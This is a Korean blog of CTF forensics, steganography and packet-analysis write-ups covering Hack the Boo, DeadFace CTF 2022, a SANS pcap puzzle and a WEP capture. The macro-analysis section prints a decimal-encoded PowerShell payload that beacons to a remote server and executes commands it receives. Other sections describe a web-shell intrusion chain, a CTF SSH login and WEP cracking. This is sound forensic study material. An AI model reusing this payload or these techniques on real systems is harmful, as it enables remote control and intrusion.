뿐만 아니라 로그온 프로세스가 ntlmssp가 적혀있는 것을 볼 수 있는데, 간단하게 말해서 ntlmssp는 NTLMSSP는 NTLM 챌린지 응답 인증을 용이하게 하고 무결성 및 기밀성 옵션을 협상하기 위해 Microsoft 보안 지원 공급자 인터페이스에서 사용하는 이진 메시징 프로토콜입니다.

그리고 키 길이가 있는것으로 보아 칼리에서 해당 윈도우 서버로 로그인을 했던 로그가 잡힌것으로 추정되며, 어떤 정보들을 빼돌렸는지는 알 수 없으나 로그인에 성공을 했기 때문에 로그가 남은 것으로 추정된다. 그래서 해당 시간인 2022-09-28 22:10:57을 UTC로 2022-09-28T13:10:57을 입력하면 플래그를 얻을 수 있었다.

사실 이번 문제는, 너무 많은 이벤트 로그가 있었으나 문제에서 키워드를 조금씩 던져줬기 때문에 쉽게 해결할 수 있었던 문제입니다.

[Halloween Invitation]

문제를 보겠습니다.

An email notification pops up. It's from your theater group. Someone decided to throw a party. The invitation looks awesome, but there is something suspicious about this document. Maybe you should take a look before you rent your banana costume.

문서 파일에 수상한 점이 있으니 분석을 요청한 시나리오 입니다.

주어진 파일을 다운받으면 docm 확장자를 가진 워드파일을 하나 받을 수 있는데, 실행을 시켜보겠습니다.

실행을 시키면, 왠지 모르게 언패킹? 된 스크립트가 짜져있는 것을 볼 수 있습니다.

vba 파일을 분석하기 위해서 구글링을 좀 했더니 olevba 라는 툴을 사용하는 것을 볼 수 있었고, 설치를 진행했습니다.

sudo apt-get update && apt-get upgrade -y
sudo -H pip install -U oletoos

https://github.com/decalage2/oletools/wiki/olevba

설치가 완료되었으면 분석을 진행하도록 하겠습니다.

우리가 문서 파일에서 볼 때는 뭔가 너저분 했기 때문에 우분투에서 파일을 한번 보겠습니다.

olevba [파일명].docm

docm 파일안에 있는 vba 매크로의 스크립트 코드를 다 출력해줍니다.

출력을 다 했으나 변수명이 좀 알아볼 수 없는? 형태가 많기 때문에 --deobf 옵션과 --reveal 옵션으로 해독을 한번 해보도록 하겠습니다.

olevba --deobf --reveal invitation.docm

해독을 하고나면 볼 수 있는 코드중에 아까 암호화된 코드에 대한 원본 코드를 볼 수 있습니다.

해독된 코드를 조금 살펴보면, 다음과 같은 코드를 볼 수 있습니다.

코드를 살짝 해석 해보면, 어떤 역할을 하는지는 잘 모르겠으나 fxnrfzsdxmcvranp 변수에 문자를 더해주는 코드가 보입니다.

이 코드가 아까 위에서 봤던 코드인데, 74 65 66 122 ~~ 로 된 것으로 보아 10진수임을 알 수 있었고, 아스키 코드로 변환을 좀 시켜보겠습니다.

a = [74,65,66,122,65,68,48,65,74,119,65,51,65,68,99,65,76,103,65,51,65,68,81,65,76,103,
65,120,65,68,107,65,79,65,65,117,65,68,85,65,77,103,65,54,65,68,103,65,77,65,65,52,
65,68,65,65,74,119,65,55,65,67,81,65,97,81,65,57,65,67,99,65,90,65,65,48,65,68,77,
65,89,103,66,106,65,71,77,65,78,103,66,107,65,67,48,65,77,65,65,48,65,68,77,65,90,
103,65,121,65,68,81,65,77,65,65,53,65,67,48,65,78,119,66,108,65,71,69,65,77,103,65,
122,65,71,69,65,77,103,66,106,65,67,99,65,79,119,65,107,65,72,65,65,80,81,65,110,65,
71,103,65,100,65,66,48,65,72,65,65,79,103,65,118,65,67,56,65,74,119,65,55,65,67,81,
65,100,103,65,57,65,69,107,65,98,103,66,50,65,71,56,65,97,119,66,108,65,67,48,65,85,
103,66,108,65,72,77,65,100,65,66,78,65,71,85,65,100,65,66,111,65,71,56,65,90,65,65,
103,65,67,48,65,86,81,66,122,65,71,85,65,81,103,66,104,65,72,77,65,97,81,66,106,65,
70,65,65,89,81,66,121,65,72,77,65,97,81,66,117,65,71,99,65,73,65,65,116,65,70,85,65,
99,103,66,112,65,67,65,65,74,65,66,119,65,67,81,65,99,119,65,118,65,71,81,65,78,65,
65,122,65,71,73,65,89,119,66,106,65,68,89,65,90,65,65,103,65,67,48,65,83,65,66,108,
65,71,69,65,90,65,66,108,65,72,73,65,99,119,65,103,65,69,65,65,101,119,65,105,65,69,
69,65,100,81,66,48,65,71,103,65,98,119,66,121,65,71,107,65,101,103,66,104,65,72,81,
65,97,81,66,118,65,71,52,65,73,103,65,57,65,67,81,65,97,81,66,57,65,68,115,65,100,
119,66,111,65,71,107,65,98,65,66,108,65,67,65,65,75,65,65,107,65,72,81,65,99,103,66,
49,65,71,85,65,75,81,66,55,65,67,81,65,89,119,65,57,65,67,103,65,83,81,66,117,65,72,
89,65,98,119,66,114,65,71,85,65,76,81,66,83,65,71,85,65,99,119,66,48,65,69,48,65,90,
81,66,48,65,71,103,65,98,119,66,107,65,67,65,65,76,81,66,86,65,72,77,65,90,81,66,67,
65,71,69,65,99,119,66,112,65,71,77,65,85,65,66,104,65,72,73,65,99,119,66,112,65,71,
52,65,90,119,65,103,65,67,48,65,86,81,66,121,65,71,107,65,73,65,65,107,65,72,65,65,
74,65,66,122,65,67,56,65,77,65,65,48,65,68,77,65,90,103,65,121,65,68,81,65,77,65,65,
53,65,67,65,65,76,81,66,73,65,71,85,65,89,81,66,107,65,71,85,65,99,103,66,122,65,67,
65,65,81,65,66,55,65,67,73,65,81,81,66,49,65,72,81,65,97,65,66,118,65,72,73,65,97,
81,66,54,65,71,69,65,100,65,66,112,65,71,56,65,98,103,65,105,65,68,48,65,74,65,66,
112,65,72,48,65,75,81,65,55,65,71,107,65,90,103,65,103,65,67,103,65,74,65,66,106,65,
67,65,65,76,81,66,117,65,71,85,65,73,65,65,110,65,69,52,65,98,119,66,117,65,71,85,
65,74,119,65,112,65,67,65,65,101,119,65,107,65,72,73,65,80,81,66,112,65,71,85,65,101,
65,65,103,65,67,81,65,89,119,65,103,65,67,48,65,82,81,66,121,65,72,73,65,98,119,66,
121,65,69,69,65,89,119,66,48,65,71,107,65,98,119,66,117,65,67,65,65,85,119,66,48,65,
71,56,65,99,65,65,103,65,67,48,65,82,81,66,121,65,72,73,65,98,119,66,121,65,70,89,
65,89,81,66,121,65,71,107,65,89,81,66,105,65,71,119,65,90,81,65,103,65,71,85,65,79,
119,65,107,65,72,73,65,80,81,66,80,65,72,85,65,100,65,65,116,65,70,77,65,100,65,66,
121,65,71,107,65,98,103,66,110,65,67,65,65,76,81,66,74,65,71,52,65,99,65,66,49,65,
72,81,65,84,119,66,105,65,71,111,65,90,81,66,106,65,72,81,65,73,65,65,107,65,72,73,
65,79,119,65,107,65,72,81,65,80,81,66,74,65,71,52,65,100,103,66,118,65,71,115,65,90,
81,65,116,65,70,73,65,90,81,66,122,65,72,81,65,84,81,66,108,65,72,81,65,97,65,66,118,
65,71,81,65,73,65,65,116,65,70,85,65,99,103,66,112,65,67,65,65,74,65,66,119,65,67,
81,65,99,119,65,118,65,68,99,65,90,81,66,104,65,68,73,65,77,119,66,104,65,68,73,65,
89,119,65,103,65,67,48,65,84,81,66,108,65,72,81,65,97,65,66,118,65,71,81,65,73,65,
66,81,65,69,56,65,85,119,66,85,65,67,65,65,76,81,66,73,65,71,85,65,89,81,66,107,65,
71,85,65,99,103,66,122,65,67,65,65,81,65,66,55,65,67,73,65,81,81,66,49,65,72,81,65,
97,65,66,118,65,72,73,65,97,81,66,54,65,71,69,65,100,65,66,112,65,71,56,65,98,103,
65,105,65,68,48,65,74,65,66,112,65,72,48,65,73,65,65,116,65,69,73,65,98,119,66,107,
65,72,107,65,73,65,65,111,65,70,115,65,85,119,66,53,65,72,77,65,100,65,66,108,65,71,
48,65,76,103,66,85,65,71,85,65,101,65,66,48,65,67,52,65,82,81,66,117,65,71,77,65,98,
119,66,107,65,71,107,65,98,103,66,110,65,70,48,65,79,103,65,54,65,70,85,65,86,65,66,
71,65,68,103,65,76,103,66,72,65,71,85,65,100,65,66,67,65,72,107,65,100,65,66,108,65,
72,77,65,75,65,65,107,65,71,85,65,75,119,65,107,65,72,73,65,75,81,65,103,65,67,48,
65,97,103,66,118,65,71,107,65,98,103,65,103,65,67,99,65,73,65,65,110,65,67,107,65,
102,81,65,103,65,72,77,65,98,65,66,108,65,71,85,65,99,65,65,103,65,68,65,65,76,103,
65,52,65,72,48,65,83,65,66,85,65,69,73,65,101,119,65,49,65,72,85,65,99,65,65,122,65,
72,73,65,88,119,65,122,65,68,81,65,78,81,66,53,65,70,56,65,98,81,65,48,65,71,77,65,
99,103,65,119,65,68,85,65,102,81,65,61]

for i in a:
    print(chr(i), end='')

코드를 실행 시키면 base64로 인코딩 된 문자열을 볼 수 있습니다.

디코딩을 하다보면 플래그 값을 찾을 수 있습니다.

이렇게 Hack the Boo 포렌식 카테고리를 모두 풀어봤습니다.

피드백 언제나 환영입니다!!

DeadFace CTF 2022 Write Up

Ron Weasley — Tue, 18 Oct 2022 22:40:39 +0900

2022년 10월 14일 오후 2시부터 15일까지 열린 DeadFace CTF에 참가하였다. (사실 기간이 지나고 포렌식 문제를 풀려고 들어간 것)

바로 롸업을 작성하도록 하겠다.

Forensic

[First Strike]

문제를 보겠습니다.

문제를 읽어보면, 7월 27일에 ESU 웹사이트에 사이버 공격이 있었다고 한다. 직원은 공격으로부터 데이터를 수집했으며, 이를 검토하여야 한다고 말한다. 그래서 공격이 시작된 IP 주소에 대해서 묻는 문제이다.

주어진 문제 파일은 Access.log와 Error.log가 있는데, Error.log에 들어가서 로그를 살펴 보도록 하겠다.

로그를 살펴보면, 클라이언트 165.227.73.138로부터 hostname(우리)인 143.244.178.213으로 request를 보내는데, 에러가 뜨는 것을 볼 수 있다.

결국엔, 공격자는 클라이언트의 IP주소인 165.227.73.138이 된다.

FLAG : flag{165.227.73.138}

[ToolBox]

문제를 한번 보도록 하겠다.

문제를 보게되면, 2022-07-27 14:13 UTC 시간에 공격을 한 도구를 찾는 문제이다.

이제는 Error.log가 아니라 Access.log를 보면 된다. 로그를 살펴보면, 공격자 클라이언트 165.227.73.138 IP로 부터 Nmap으로 네트워크 스캐닝을 하는 것을 볼 수 있다.

그래서 답은 Nmap이된다.

FLAG : flag{Nmap}

[Agents of Chaos]

문제를 보게 되면, 네트워크 스캔을 도구 중 첫번째는 nmap이고 두 번째로 해당하는 것을 찾고, 첫번 째 공격을 찾는 문제이다.

Nmap에서 Nikto로 툴이 바뀐 것을 확인할 수 있다.

그리고 우측에 Test : Port Check가 보이고 포트를 검색하는 그런 기능인 것 같다.

Port Check로 플래그를 넣어줬지만 플래그가 인식이 되지 않아서 Mozilla부터 (Port Check) 까지 붙혀넣으니 답이 된다.

Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:Port Check)

위에 나오는 문장이 플래그이다.

[Iterations]

문제를 한번 보도록 하겠다.

문제를 읽어 보면, 로그인을 시도 했고 로그인을 성공한 도구가 있다고 한다. 그 도구의 이름을 찾는 문제이다.

Hydra라는 툴을 사용하였고, GET으로 올린 파일의 이름이 login.php이다. 결국엔 Hydra 툴이 답이 된다.

FLAG : flag{Hydra}

[Submission]

1번부터 이어지는 문제 중 마지막 문제이다.

문제를 읽어보면, 파일 시스템에 액세스하기 위해 ESU의 웹 사이트에 올린 아티팩트는 무엇인지 찾는 문제이다.

위에서 설명 했듯이, login.php로 로그인을 시도해서 권한을 탈취하는 것 까지는 분석을 진행하였다.

이 로그들을 보시면, login.php로 로그인을 성공하여 계속해서 파일을 업로드하는 것을 볼 수 있다.

문제를 읽어보면, 웹 사이트에 올린 아티팩트를 찾는 문제인데, 결국엔 업로드 한 파일중에서 찾아봐야 하는 것이다.

로그 가장 하단에 보면, 정보에 대한 php파일이 업로드 되는 것을 확인할 수 있다.

infomation에는 파일 시스템에 대한 정보도 들어있으므로 info.php가 플래그 값이 된다.

FLAG : flag{info.php}

[Grave Digger1]

문제를 한번 보겠습니다.

문제를 읽어 보시면, crypto_vamp 계정이 취약하니까 들어가서 플래그를 찾아라. 이말로 해석이 될 수 있는데,

결국엔 ssh로 접속을 바로 해보시면 됩니다.

ssh crypto_vamp@env.deadface.io

password : 123456789q

위와 같은 명령으로 접속을 진행하면 다음과 같은 화면처럼 될 것이다.

이제 분석을 진행하기 위해서 해당 서버의 환경을 봐야해서 env 명령을 사용하였다.

근데 바로 플래그값이 나와서 조금 당황했지만, 그럴 수 있다고 생각한다!

[Inode What you Did Last Summer]

문제를 한번 보겠습니다.

문제를 보면, 7월 27일에 있었던 공격에 대한 내용중 파일이 수정된 것을 찾고, 그 파일에 대한 아이노드 값을 가져오라는 문제인데 처음에 이 문제만 딱 받았을때는 진짜 고민이 많았습니다. inode 번호를 본 적도 없고...그래서 반나절 이상 삽질을 진행했던 것 같습니다. 풀이를 바로 쓰도록 하겠습니다.

주어진 문제를 다운로드하면, gz 파일을 하나 줍니다.

gz 파일을 풀면, 메모리 덤프 파일과 zip 파일을 하나 주어집니다.

메모리 덤프 파일을 분석하기 위해 볼라틸리티를 사용했고, 볼라틸리티를 이용해서 해당 메모리 덤프 파일의 운영체제 버전을 확인하도록 하겠습니다.

볼라틸리티 설치 방법은 제 블로그에 volatility3를 보시면 됩니다.

$ python3 vol.py -f esu-mem-20220727154029.dmp banner

입력을 하게 되면, 리눅스 메모리 덤프 파일로 되어있으며 버전은 5.4.0-122 입니다.

리눅스 메모리 포렌식을 하기 위해서는 볼라틸리티 프로그램 내부에 커널 버전을 심어주고 info 명령어를 통해서 인식을 시켜줘야 분석이 가능합니다.

그래서 ubuntu 커널 버전에 맞는 ISF 파일을 찾아서 심어줘야 하는데 이번 문제에서는 착하게 주어주는군요..!

위에 압축 파일에 있는 Ubuntu_5.4.0-122-generic.zip 파일을 바로 심어주면 되는데, 저는 이번 문제가 볼라틸리티 3으로 분석을 하니 플러그인이 많이 부족해서 볼라틸리티 2버전을 사용했습니다.

volatility2에 리눅스 파일을 심어줄려면 /volatility/volatility/plugins/overlays/linux 파일에 넣어주기만 하면 됩니다.

이렇게 심어줬으면, info 명령어로 한번 볼까요?

프로파일이 인식이 되면, 정상적으로 잘 심어준 겁니다!!

리눅스 플러그인은 다음 링크를 통해서 배우시면 됩니다.

https://github.com/volatilityfoundation/volatility/wiki/Linux-Command-Reference#linux_bash

프로세스 리스트를 먼저 보겠습니다.

$ python vol.py -f [이미지 파일] --profile=LinuxUbuntu_5_4_0-122-genericx64 linux_pslist

27일 이후에 된 프로세스들을 보면, apache2도 보이고 avml(메모리 덤프) 프로그램도 보이는 것을 확인할 수 있습니다.

그래서 메모리 덤프 파일의 리스트를 보면 되니까 리스트를 한번 보겠습니다.

$ python vol.py -f [이미지 파일] --profile=LinuxUbuntu_5_4_0-122-genericx64 linux_find_file -L > find_file.txt

너무 많은 양을 보여주기 때문에 txt 파일로 추출해서 좀 보겠습니다.

backups 경로에 gz으로 된 백업 파일도 보이고 하는데, 더 찾아 보도록 하겠습니다.

pcap파일이 2개 있네요?? pcap 파일을 추출해보도록 하겠습니다.

$ python vol.py -f esu-mem-20220727154029.dmp --profile=LinuxUbuntu_5_4_0-122-genericx64 linux_find_file -i 0xffff9591bb1a3890 -O capture_20220727124309.pcap

추출을 하니까 NULL값으로 꽉 채워진 파일이 하나 나오는 것을 보아 정상적으로 추출이 되지 않은 것 같습니다...그래서 아까 우리가 프로세스에서 본 것 중에서 27일 이후로 된 프로세스중 avml로 된 메모리 덤프를 시켜주는 프로그램을 본 적이 있습니다. 그래서 avml을 찾아보도록 하겠습니다.

avml을 보니까 backup.py가 있어서 뭘 백업하는지 궁금해서 추출하니까 다음과 같은 스크립트가 짜져 있었습니다.

보니까 아까 위에 backup 경로에 있는 backup.gz이 이 스크립트를 통해서 만들어진 것을 확인할 수 있었습니다.

그래서 backup.py 파일에 나와있는 788070이 inode 값이 되고, 입력을 하니 정답이 풀렸습니다.

근데 완벽하지 않은 상태에서 찝찝하게 푼 이 기분이 참 더러워서 하단에 네트워크 패킷 분석하는 롸업이 있는데 그거랑 합쳐서 적어보겠습니다.

공격의 원리를 살펴보면, access.log에서 봤다시피 네트워크 스캔을 하고 login.php를 올려서 injection을 하고 로그인을 성공했다. 까지만 나와있었습니다. 하지만 추후에 남기는 로그들이 pcap 파일에 있었으나, 해당 메모리 덤프 파일에서는 추출이 되지 않아서 Traffic 카테고리에서 나오는 패킷을 보니 동일한 NULL 값으로 추출된 pcap 파일의 크기와 분석을 하기 위해 쓴 pcap 파일이 같은 바이트와 같은 파일 이름을 가지는 것을 확인할 수 있었다.

왼쪽은 추출한 pcap 파일이고, 우측은 분석을 하라고 준 pcap 파일이다.

결국엔 트래픽 카테고리 문제와 포렌식 카테고리의 문제가 이어져 있다는것인데...참 황당한 일이다.

그래서 패킷을 보면, shell을 가져와서 backup.py를 실행시키고 gz을 생성하는 이런 일련의 과정들을 다 하는 것을 볼 수 있다. (뒤에 설명)

그리고 dump 파일을 hxd로 열어보면 답을 좀 찾을 수 있다.

welcome.php 파일이 보이는 것으로 보아 아이디에 접속을 했다는 뜻이고, 하단으로 내려보면 backup.py를 tmp 파일로 옮기는 것을 볼 수 있다.

이를 보면서 풀 수도 있겠지만...사실상 말이 안되는 문제이다!!!

Steganography

[The Goodest Boy]

문제를 한번 보겠습니다.

주어진 사진 파일을 다운 받아서 hxd로 열어보면 하단에 패스워드가 하나 존재합니다.

패스워드가 있다는 말은 즉, steghide나 opensteganography툴을 사용해서 패스워드만 입력하면 풀린다는 말이다.

그래서 칼리에서 steghide툴을 사용해서 패스워드를 해제하고 숨겨진 플래그를 찾아보도록 하겠다.

명령어를 입력하게 되면 itsasecret.pdf 파일이 하나 추출되는 것을 볼 수 있다.

열어보면 플래그가 존재한다.

[Eye Know, Do you?]

문제를 한번 보겠다.

주어진 이미지 파일에서 플래그를 찾아라는 문제인데, 파일을 다운로드 하면 이상한 눈이 하나 나온다.

hxd로 열어봤더니 패스워드는 보이지 않아서, 명암을 조절해주기 위해 stegsolve를 사용하였다.

하단에 플래그로 보이는 것이 나오는데, 글씨가 흐릿해서 잘 보이진 않는다.

그래서 자꾸 색을 바꿔주니...어느 정도는 알 수 있게 나왔다.

FLAG : flag{Deadface_Knows_All_Seas_All}

[Life's a Glitch]

문제를 한번 보겠습니다.

문제를 읽어 보면 GIF 파일을 하나 줄테니까 스테가노그래피해라라고 적혀있습니다.

마찬가지로 hxd로는 답이 나오지 않아 stegsolve를 사용하니까 플래그 값을 구할 수 있었습니다.

Traffic Analysis

이번에 푼 카테고리는 Traffic Analysis라고해서 네트워크 패킷을 가지고 분석을 하는 문제들이다.

근데 이번 카테고리와 포렌식 카테고리가 이어지는 부분이 있어보인다. 왜냐하면 포렌식 마지막 문제를 푸는 것이 네트워크 패킷 로그를 분석해야 되는데 리눅스 메모리 포렌식에서 pcap파일이 추출되지 않아서 분석을 좀 진행해보니 지금 분석하고 있는 카테고리에서 동일한 파일이 포렌식 메모리 덤프 파일에서 나오는 것을 발견하여 같이 보면서 풀면 쉽게 풀리는 문제들이 많이 있었다.

[Dreaming of You]

문제를 한번 보겠습니다.

pcap파일을 하나 주고, 플래그를 찾으라는 문제인데 뭐...명확한 문제를 주질 않았으니 와이어샤크로 분석을 진행하겠습니다.

패킷 캡쳐 내용을 보면, TELNET 프로토콜을 가지고 접속을 한 흔적이 보입니다.

TCP Stream으로 분석을 좀 해보면, 로그인을 하기 위해서 많은 시도를 하는 것을 볼 수 있습니다.

그래서 필터링으로 TELNET 프로토콜을 제외하고 다 지워보고 분석을 시도했습니다.

아까 위에서 본 사진이 TELNET 프로토콜의 TCP Stream 0번 이였다면, 밑에 나와있는 것은 4번입니다.

TCP Stream 4번을 보니까, 리눅스가 아니라 윈도우 환경으로 접속을 하는 것을 볼 수 있습니다.

또 보시면, 볼륨 넘버가 F0DA-E16B로 잡히는 것을 볼 수도 있습니다.

쭉 내리다 보면, 플래그 값을 볼 수 있습니다.

[Scans]

문제를 한번 보겠습니다.

Traffic Analysis 문제이기 때문에 마찬가지로 pcap파일을 주는데, zip 파일로 압축되어서 파일을 하나 줍니다.

압축 파일의 패스워드는 하단에 있는 것과 같이 열면 pcap파일을 하나 줍니다.

이번 문제에서는 deadface가 처음 시작한 스캔의 유형을 찾는 문제입니다.

ICMP 프로토콜이 있는 것으로 보아 ping을 보낸 것 같구여, ping을 보낸 이유는 해당 ip를 인식 시켜주기 위해서 그런 행동입니다.

그래서 41518 포트에서 80포트로 ACK 패킷을 보냈는데 80포트에서 RESET을 보냄으로써 에러가 발생했습니다.

다음은 41518 포트가 443 포트에 SYN 패킷을 보내고, 443 포트에서 답장으로 SYN, ACK 패킷을 보냈습니다. 하지만 3-way-handshake 과정에서는 SYN→SYN, ACK→ACK 형태로 되어야 하지만, ACK를 보내지 않고 RESET을 보냅니다. 이것으로 보아 처음 시작한 스캔의 유형을 보면, ping을 제외하고 다음에 오는 ACK 패킷도 제외를 하면, 클라이언트에서 보낸 패킷 중 가장 먼저 보낸 패킷은 SYN 입니다.

FLAG : flag{syn}

[Passing on Complexity]

문제를 한번 보겠습니다.

이 문제는, 앞에서 분석했던 scans 문제랑 같은 파일을 가지고 풀어야 하기 때문에 주어진 문제 파일은 따로 없습니다.

문제를 보면, 사용자가 백업을 했는데, 백업 사용자의 암호를 확인해달라고 하니까 평문이나 암호화된 문자로 password가 존재함을 알 수 있다.

패킷을 보면 90000개 이상 잡혀있는데, 다 필요없는 패킷들이고, TCP Stream 4999번째를 보면, 다음과 같은 데이터들이 잡힌것을 볼 수 있다.

리눅스에서 입력한 명령어들이 잡힌 패킷들을 볼 수 있는데, 하단으로 쭉 내려보니 backup파일이 하나 보인다.

위 사진에서 cat /opt/backup.py를 하고 난 후, 실행된 python 코드를 보면, -pbackup123으로 된 부분을 볼 수 있다.

-p 옵션이 패스워드를 입력하는 부분이기 때문에 패스워드는 backup123이다.

FLAG : flag{backup123}

[Shells]

문제를 한번 보겠습니다.

이번 문제도 scans 문제에서 준 pcap 파일로 푸는 문제이고, 문제 해석을 하면, 공격자가 웹 서버 백엔드에 액세스하기 위해 info.php라는 파일을 업로드 했다고 한다. 여기서 info.php는 포렌식 카테고리에 있는 access.log를 읽어보면 나온다. 그리고 공격자에게 웹 셸을 제공한 셸의 이름을 찾는것이다.

TCP Stream 4999번을 보면, 가장 위에 shell이라고 해서 웹 쉘을 보여주고있다. 그래서 셸의 이름은 b374k이다.

FLAG : flag{b374k}

[Escalation]

문제를 한번 보겠습니다.

문제를 살펴보면, 루트 액세스 권한을 얻기 위해 기존 파일을 활용했다고 한다. 공격자가 웹 서버에서 루트 권한을 얻을 수 있도록 수정된 파일을 찾는 문제인데, 아까 cmd 프로그램으로 backup.py를 실행시키는 것을 봤었다.

이 말은 즉, backup.py를 cmd로 실행 시킴으로써 루트 권한을 얻었고, 코드를 읽어보면 이런식으로 백업 gz파일을 계속 만드는 것을 볼 수 있다.

해당 사진은 포렌식 카테고리에서 본 사진을 가져온 것이니 혼동하지말자!

그래서 결국엔 변수의 이름은 cmd이고, 파일의 이름은 backup.py이다.

FLAG : flag{backup.py_cmd}

[The Root of All Evil]

문제를 한번 보겠습니다.

문제를 보면, 루트가 액세스 권한을 얻은 후 남긴 플래그를 찾는 문제이다. TCP Stream 5054번을 가면 또 다른 데이터들을 확인할 수 있었다.

위에 보시면, bash로 쉘이 나와있고 whoami 명령어를 통해서 자신이 root임을 알 수 있다.

하단에 보시면 echo로 플래그가 작성되어 있고 이게 공격자가 남긴 플래그 값으로 추정이 된다.

이번에 푸는 문제가 막 어렵진 않은데, 패킷이 너무 많다보니 찾는데 더 오래 걸린 것 같다.

[New Addition]

문제를 한번 보겠습니다.

데이터 베이스에 사용자를 추가했고, 사용자의 이름을 찾는 문제이다.

show databases;를 하는 것으로 보아 mysql 데이터 베이스이다.

데이터 베이스의 사용자는 esu만 있는 것으로 추정이 되며, 테이블에는 아무것도 없는 것으로 추정이 된다.

5054번 TCP Stream에서는 데이터 베이스에 관한 패킷은 없어서, 다른 패킷을 또 찾으러 다녔다.

5158번 TCP Stream을 보면, database에 대한 패킷이 잡혀있다.

가장 위에 보면, INSERT INFO로 user를 삽입 해주는 것을 볼 수 있다.

결국엔 데이터 베이스의 username은 areed2022가 된다.

FLAG : flag{areed2022}

[SHAshank Redemption]

문제를 한번 보겠습니다.

문제에도 보시다시피 SHA 해쉬 알고리즘을 가지고 암호화된 해쉬값을 찾는 문제인 것으로 보인다.

TCP Stream 5054번 데이터를 보면, sha1sum으로 해쉬값을 보는 패킷이 잡혀있다.

이렇게 네트워크 패킷을 분석하는 문제와 포렌식 문제와 스테가노 그래피 문제를 풀어봤는데, 스테가노는 아무리 봐도 모르겠고 포렌식과 네트워크를 거의 올클했다...!!

[패킷 분석] SANS Puzzle 분석

Ron Weasley — Mon, 17 Oct 2022 01:54:34 +0900

이번 시간에 분석해볼 패킷은 SANS Puzzle.pacp 파일입니다.

문제는 시나리오 기반으로 되어 있으며, 생각보다 쉽게 풀려서 글을 빠르게 쓰도록 하겠습니다.

[ 시나리오 ]

Ann’s과 친구는 메신저로 중요한 음식의 비밀 레시피를 주고 받았다. 우리가 획득한 패킷을 분석하여 해당 레시피가 무엇인지 획득하고 다음과 같은 물음에 답변하여라.

[ 문제 ]

1. Ann's의 친구의 메신저 이름은 무엇인가?

2. 캡쳐된 메신저 대화 중 첫번째 대화는 무엇인가?

3. Ann's가 보낸 파일의 이름은 무엇인가?

4. 당신이 추출하고자 하는 파일의 시그니처는 무엇인가?

5. 파일의 MD5 해쉬 값은 무엇인가?

6. 파일 안에는 어떤 내용이 들어있는가?

바로 문제를 풀어보도록 하겠습니다.

먼저, 와이어샤크로 패킷을 열어보면 TCP, ARP, NTP 등등 패킷들이 잡혀있는 것을 볼 수 있습니다.

1번 문제에서 "메신저" 라는 키워드가 나와있는데 메신저 어플을 사용했다면 암호화된 대화내용이 패킷에 잡힌다.

패킷을 살펴보면 23번 패킷에 SSL과 TCP 프로토콜이 서로 주고 받는 패킷을 볼 수 있는데, TCP Stream으로 열어보면 반은 평문, 반은 암호화된 대화 내용을 볼 수 있다. 하지만 과거에는 SSL이 버전이 낮아 암호화가 되다가 말았지만 현재는 완벽히 암호화가 되는 것으로 알고있다.

보시면, 평문으로 된 데이터들도 보이고 E4628778처럼 암호화 된 데이터들도 보입니다. 그래서 메신저라면 처음에 From하고 친구의 아이디가 나오기 때문에 1번에 답을 바로 구할 수 있다.

답 : Sec558user1

2번 문제도 마찬가지로 Here's the 하고 바로 나오기 때문에 답을 불러낼 수 있다.

답 : Here's the secret recipe... I just downloaded it from the file server. Just copy to a thumb drive and you're good to go

3번 문제는 중간쯤 보시면 recipe.docx라고 적혀있습니다.

ann's가 보낸 파일 이름입니다.

답 : recipe.docx

4번 문제는 파일의 시그니처인데, docx 파일은 PKZIP 형식으로 시그니처가 되어 있기 때문에 50 4B 03 04입니다.

답 : 50 4B 03 04

5번을 풀기 위해서는 파일 카빙을 진행 해야 합니다.

TCP Stream 5번을 RAW 데이터로 보면, 504b0304로 된 데이터들이 보입니다.

여기서 부터 카빙을 진행하시면 되는데, 우리가 받은 데이터이기 때문에 파란색으로 칠해진 데이터까지 카빙을 해야 합니다.

카빙을 다 하셨으면 hxd 에디터로 붙혀넣기를 한다음 docx로 저장을 하고 md5를 보시면 됩니다.

해시값이 저랑 다르다면, 파일 카빙을 잘 못 한겁니다.

마지막으로 파일 안의 내용을 보면 되는것이기에 docx 파일을 실행시키겠습니다.

어떤 것을 만드는 지는 모르겠으나...왠지 달달한 것을 만드는 것 같네요 ㅎㅎ 이렇게 SANS Puzzle.pcap을 분석 해봤습니다.

[패킷 분석] 무선랜 패킷 분석

Ron Weasley — Sat, 15 Oct 2022 01:57:53 +0900

이번 시간에는 무선랜으로 패킷이 잡혀있는 패킷 파일을 분석을 진행 해보도록 하겠습니다.

패킷 파일을 실행시켜 보면 암호화 된 패킷들이 보이는데 지금처럼 무선랜 환경에서의 패킷은 암호화가 된 상태로 잡히게 됩니다.

패킷들을 살펴보면 wep 프로토콜로 암호화가 된 것을 볼 수 있는데, 암호화가 된 패킷들은 크랙을 통하여 복호화를 시켜줘야 합니다.

복호화를 하기 위해서는 Aircrack-ng 프로그램이 필요한데, 복호화를 하는 순서를 보겠습니다.

일단, wep를 복호화 하기 위해서는 키가 필요합니다. WEP 암호화 키는 64bit일 경우 01:02:03:04:05 와 같이 입력을 해야 하고, 128bit일 경우에는 0102030405060607080 이런식으로 키 값이 나오는 것을 볼 수 있습니다.

먼저, Filename란에 Choose를 클릭하여 키를 뽑아 낼 패킷 파일을 집어 넣습니다.

집어 넣고, Encryption을 WEP으로 지정한 다음 64bit를 선택하고 하단아 Launch를 클릭하게 되면 키 값을 볼 수 있습니다.

키 값은 4A:7D:B5:08:CD 인 것으로 나오고 이 값을 가지고 복호화를 해봅시다.

키 값을 입력을 하고 Launch를 누르면 복호화가 됩니다.

패킷이 187650개가 있다고 알려주네요. 복호화를 다 하셨으면 해당 파일의 경로에 dec 파일이 생깁니다.

dec 파일을 실행시키면 정상적으로 패킷이 돌아온 것을 확인할 수 있었습니다.

패킷들을 분석을 좀 해보니까 Apple Mail, Apple Itunes 등등 패킷들이 잡혀있는 것으로 보아 맥북인 것으로 추정된다.

추정이라고 단어를 쓴 이유는 직접 패킷을 뜬 것이 아니기 때문에 확신을 할 수 없기 때문이다. 참고로 TCP12번 패킷을 보면 WIFI가 있으므로 맥북 아니면...아이패드...아이폰 중 하나로 보인다!!

지금까지 무선랜 패킷을 분석하는 방법을 봤는데, 무선랜 패킷에서 가장 중요한 것은 WEP로 암호화가 되었으면 패킷의 키를 구해야 하는 것이 가장 중요하기 때문에 크랙 도구가 없다면 수동으로 구해야 하는데, 구하는 방법은 링크를 통해서 보면 될 것이다.

- 참고자료 -

https://takudaddy.tistory.com/284

[패킷 분석] HackThePacket 분석

Ron Weasley — Thu, 13 Oct 2022 19:40:29 +0900

